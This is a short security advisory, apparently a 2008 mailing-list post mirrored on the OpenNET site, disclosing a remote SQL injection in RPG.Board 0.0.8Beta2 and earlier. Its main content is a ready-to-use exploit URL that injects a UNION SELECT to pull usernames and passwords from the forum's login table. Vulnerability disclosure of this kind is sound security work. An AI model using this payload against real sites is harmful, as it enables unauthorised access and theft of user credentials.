The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


RPG.Board <= 0.0.8Beta2 Remote SQL Injection


<< Previous INDEX Search src / Print Next >> 
Date: 26 Sep 2008 15:16:24 -0000
From: [email protected]
To: [email protected]
Subject: RPG.Board <= 0.0.8Beta2 Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RPG.Board

[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69

[~] Vulnerability Class: SQL Injection



[~] Exploit:

Register, login and testing exploit..

http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]_userlogin

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру